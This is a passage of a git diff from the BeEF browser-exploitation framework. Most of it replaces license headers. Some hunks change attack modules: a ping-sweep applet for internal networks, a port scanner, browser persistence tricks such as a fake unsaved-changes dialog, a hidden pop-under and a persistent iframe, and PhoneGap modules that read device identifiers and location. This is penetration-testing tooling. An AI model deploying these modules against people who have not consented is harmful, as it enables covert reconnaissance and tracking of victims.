"." + octets[2] + "." + i; - addresses.add(InetAddress.getByName(ip)); - } - } else { //single ip: ipRange = 172.31.229.240 - addresses.add(InetAddress.getByName(ipRange)); - } - return addresses; - } - - private static String checkHosts(List inetAddresses) throws IOException { - String alive = ""; - for (InetAddress inetAddress : inetAddresses) { - if (inetAddress.isReachable(timeout)) { - alive += inetAddress.toString() + "\n"; - } - } - return alive; - } -} +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + +import java.applet.Applet; +import java.io.IOException; +import java.net.InetAddress; +import java.net.UnknownHostException; +import java.util.ArrayList; +import java.util.List; + +/* + * Coded by Michele "antisnatchor" Orru' for the BeEF project. + * Given a single IP or IP range, check without hosts are alive (ping sweep). + */ +public class pingSweep extends Applet { + + public static String ipRange = ""; + public static int timeout = 0; + public static List hostList; + + public pingSweep() { + super(); + return; + } + + public void init(){ + ipRange = getParameter("ipRange"); + timeout = Integer.parseInt(getParameter("timeout")); + } + + //called from JS + public static int getHostsNumber(){ + try{ + hostList = parseIpRange(ipRange); + }catch(UnknownHostException e){ //do something + + } + return hostList.size(); + } + + //called from JS + public static String getAliveHosts(){ + String result = ""; + try{ + result = checkHosts(hostList); + }catch(IOException io){ + //do something + } + return result; + } + + private static List parseIpRange(String ipRange) throws UnknownHostException { + + List addresses = new ArrayList(); + if (ipRange.indexOf("-") != -1) { //multiple IPs: ipRange = 172.31.229.240-172.31.229.250 + String[] ips = ipRange.split("-"); + String[] octets = ips[0].split("\\."); + int lowerBound = Integer.parseInt(octets[3]); + int upperBound = Integer.parseInt(ips[1].split("\\.")[3]); + + for (int i = lowerBound; i <= upperBound; i++) { + String ip = octets[0] + "." + octets[1] + "." + octets[2] + "." + i; + addresses.add(InetAddress.getByName(ip)); + } + } else { //single ip: ipRange = 172.31.229.240 + addresses.add(InetAddress.getByName(ipRange)); + } + return addresses; + } + + private static String checkHosts(List inetAddresses) throws IOException { + String alive = ""; + for (InetAddress inetAddress : inetAddresses) { + if (inetAddress.isReachable(timeout)) { + alive += inetAddress.toString() + "\n"; + } + } + return alive; + } +} diff --git a/modules/network/port_scanner/command.js b/modules/network/port_scanner/command.js index 415c914e6..643ab15d8 100644 --- a/modules/network/port_scanner/command.js +++ b/modules/network/port_scanner/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var blocked_ports = [ 1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 37, 42, 43, 53, 77, 79, 87, 95, 101, 102, 103, 104, 109, 110, 111, 113, 115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512, 513, 514, 515, 526, 530, 531, 532, 540, 556, 563, 587, 601, 636, 993, 995, 2049, 3659, 4045, 6000, 6665, 6666, 6667, 6668, 6669, 65535 ]; diff --git a/modules/network/port_scanner/config.yaml b/modules/network/port_scanner/config.yaml index a1ac2d103..190d528ef 100644 --- a/modules/network/port_scanner/config.yaml +++ b/modules/network/port_scanner/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/port_scanner/module.rb b/modules/network/port_scanner/module.rb index 4b0957bdd..e9317b6e8 100644 --- a/modules/network/port_scanner/module.rb +++ b/modules/network/port_scanner/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # Port Scanner Module - javier.marcos diff --git a/modules/persistence/confirm_close_tab/command.js b/modules/persistence/confirm_close_tab/command.js index 1609bcab7..093149ab4 100644 --- a/modules/persistence/confirm_close_tab/command.js +++ b/modules/persistence/confirm_close_tab/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { function display_confirm(){ @@ -31,6 +22,7 @@ beef.execute(function() { if (e.stopPropagation) { e.stopPropagation(); e.preventDefault(); + e.returnValue = "There is currently a request to the server pending. You will lose recent changes by navigating away."; } } diff --git a/modules/persistence/confirm_close_tab/config.yaml b/modules/persistence/confirm_close_tab/config.yaml index 62bcd36e6..154bcfb64 100644 --- a/modules/persistence/confirm_close_tab/config.yaml +++ b/modules/persistence/confirm_close_tab/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -19,7 +9,7 @@ beef: enable: true category: "Persistence" name: "Confirm Close Tab" - description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12" + description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12. In Chrome you can't keep opening confirm dialogs." authors: ["antisnatchor"] target: user_notify: ["ALL"] diff --git a/modules/persistence/confirm_close_tab/module.rb b/modules/persistence/confirm_close_tab/module.rb index e38abbfd5..8ec20a65b 100644 --- a/modules/persistence/confirm_close_tab/module.rb +++ b/modules/persistence/confirm_close_tab/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Confirm_close_tab < BeEF::Core::Command diff --git a/modules/persistence/iframe_above/command.js b/modules/persistence/iframe_above/command.js index 3cf076368..a0179982c 100644 --- a/modules/persistence/iframe_above/command.js +++ b/modules/persistence/iframe_above/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { - beef.session.persistent(); + beef.dom.persistentIframe(); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Links have been rewritten to spawn an iFrame.'); }); diff --git a/modules/persistence/iframe_above/config.yaml b/modules/persistence/iframe_above/config.yaml index 7bff8e43b..9046ab30a 100644 --- a/modules/persistence/iframe_above/config.yaml +++ b/modules/persistence/iframe_above/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/persistence/iframe_above/module.rb b/modules/persistence/iframe_above/module.rb index 053986199..14554755f 100644 --- a/modules/persistence/iframe_above/module.rb +++ b/modules/persistence/iframe_above/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Iframe_above < BeEF::Core::Command diff --git a/modules/persistence/man_in_the_browser/command.js b/modules/persistence/man_in_the_browser/command.js index 148b64eb0..c016c79ef 100644 --- a/modules/persistence/man_in_the_browser/command.js +++ b/modules/persistence/man_in_the_browser/command.js @@ -1,17 +1,8 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ beef.execute(function() { try{ diff --git a/modules/persistence/man_in_the_browser/config.yaml b/modules/persistence/man_in_the_browser/config.yaml index 1f022ef1d..984d292b5 100644 --- a/modules/persistence/man_in_the_browser/config.yaml +++ b/modules/persistence/man_in_the_browser/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/persistence/man_in_the_browser/module.rb b/modules/persistence/man_in_the_browser/module.rb index 75e8255c0..4632bc357 100644 --- a/modules/persistence/man_in_the_browser/module.rb +++ b/modules/persistence/man_in_the_browser/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Man_in_the_browser < BeEF::Core::Command diff --git a/modules/persistence/popunder_window/command.js b/modules/persistence/popunder_window/command.js index 92cc6b07b..9ed5b6beb 100644 --- a/modules/persistence/popunder_window/command.js +++ b/modules/persistence/popunder_window/command.js @@ -1,23 +1,14 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var result = "Pop-under window successfully created!"; - window.open('http://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur(); + window.open(beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur(); window.focus(); diff --git a/modules/persistence/popunder_window/config.yaml b/modules/persistence/popunder_window/config.yaml index 8af49d40c..b3113f7a4 100644 --- a/modules/persistence/popunder_window/config.yaml +++ b/modules/persistence/popunder_window/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/persistence/popunder_window/module.rb b/modules/persistence/popunder_window/module.rb index 850d1b6b6..0d92f5023 100644 --- a/modules/persistence/popunder_window/module.rb +++ b/modules/persistence/popunder_window/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Popunder_window < BeEF::Core::Command diff --git a/modules/phonegap/phonegap_beep/command.js b/modules/phonegap/phonegap_beep/command.js index 1bf39ecce..b3a51c90a 100644 --- a/modules/phonegap/phonegap_beep/command.js +++ b/modules/phonegap/phonegap_beep/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // make the phone beep // beef.execute(function() { diff --git a/modules/phonegap/phonegap_beep/config.yaml b/modules/phonegap/phonegap_beep/config.yaml index c474553aa..5dc6e1077 100644 --- a/modules/phonegap/phonegap_beep/config.yaml +++ b/modules/phonegap/phonegap_beep/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_beep/module.rb b/modules/phonegap/phonegap_beep/module.rb index 013ae3b3c..3993e9fb2 100644 --- a/modules/phonegap/phonegap_beep/module.rb +++ b/modules/phonegap/phonegap_beep/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_check_connection/command.js b/modules/phonegap/phonegap_check_connection/command.js index 470ab3638..d1bf87eb8 100644 --- a/modules/phonegap/phonegap_check_connection/command.js +++ b/modules/phonegap/phonegap_check_connection/command.js @@ -1,17 +1,9 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { var connection_type; diff --git a/modules/phonegap/phonegap_check_connection/config.yaml b/modules/phonegap/phonegap_check_connection/config.yaml index 37ebf924b..ab6256e52 100644 --- a/modules/phonegap/phonegap_check_connection/config.yaml +++ b/modules/phonegap/phonegap_check_connection/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # @@ -20,8 +10,8 @@ beef: phonegap_check_connection: enable: true category: "Phonegap" - name: "Check connection" - description: "Find out connection type e.g. Wifi, 3G.." + name: "Check Connection" + description: "Find out the network connection type e.g. Wifi, 3G." authors: ["mh"] target: working: ["All"] diff --git a/modules/phonegap/phonegap_check_connection/module.rb b/modules/phonegap/phonegap_check_connection/module.rb index 708c0d384..03cb18f72 100644 --- a/modules/phonegap/phonegap_check_connection/module.rb +++ b/modules/phonegap/phonegap_check_connection/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_detect/command.js b/modules/phonegap/phonegap_detect/command.js index bc062c00c..49b4f55ce 100644 --- a/modules/phonegap/phonegap_detect/command.js +++ b/modules/phonegap/phonegap_detect/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // detect phonegap // beef.execute(function() { @@ -26,7 +17,8 @@ beef.execute(function() { + " cordova api: " + device.cordova + " platform: " + device.platform + " uuid: " + device.uuid - + " version: " + device.version; + + " version: " + device.version + + " model: " + device.model; } catch(e) { phonegap_details = "unable to detect phonegap"; } diff --git a/modules/phonegap/phonegap_detect/config.yaml b/modules/phonegap/phonegap_detect/config.yaml index e1e55e846..8fa326988 100644 --- a/modules/phonegap/phonegap_detect/config.yaml +++ b/modules/phonegap/phonegap_detect/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_detect/module.rb b/modules/phonegap/phonegap_detect/module.rb index 8242c79e8..b2d3709b5 100644 --- a/modules/phonegap/phonegap_detect/module.rb +++ b/modules/phonegap/phonegap_detect/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_file_upload/command.js b/modules/phonegap/phonegap_file_upload/command.js index c6b15e78e..bb8d239f0 100644 --- a/modules/phonegap/phonegap_file_upload/command.js +++ b/modules/phonegap/phonegap_file_upload/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // phonegap_upload // beef.execute(function() { diff --git a/modules/phonegap/phonegap_file_upload/config.yaml b/modules/phonegap/phonegap_file_upload/config.yaml index f82d42fe8..6da1ecbf3 100644 --- a/modules/phonegap/phonegap_file_upload/config.yaml +++ b/modules/phonegap/phonegap_file_upload/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_file_upload/module.rb b/modules/phonegap/phonegap_file_upload/module.rb index 41b5f712f..c508ea21c 100644 --- a/modules/phonegap/phonegap_file_upload/module.rb +++ b/modules/phonegap/phonegap_file_upload/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_geo_locate/command.js b/modules/phonegap/phonegap_geo_locate/command.js index 15ea8fbf7..99f0ef075 100644 --- a/modules/phonegap/phonegap_geo_locate/command.js +++ b/modules/phonegap/phonegap_geo_locate/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // geo locate // beef.execute(function() { @@ -36,7 +27,7 @@ beef.execute(function() { // onError Callback receives a PositionError object // function onError(error) { - console.log('code: ' + error.code + '\n' + + beef.debug('code: ' + error.code + '\n' + 'message: ' + error.message + '\n'); } diff --git a/modules/phonegap/phonegap_geo_locate/config.yaml b/modules/phonegap/phonegap_geo_locate/config.yaml index cb2a83894..75007ab6d 100644 --- 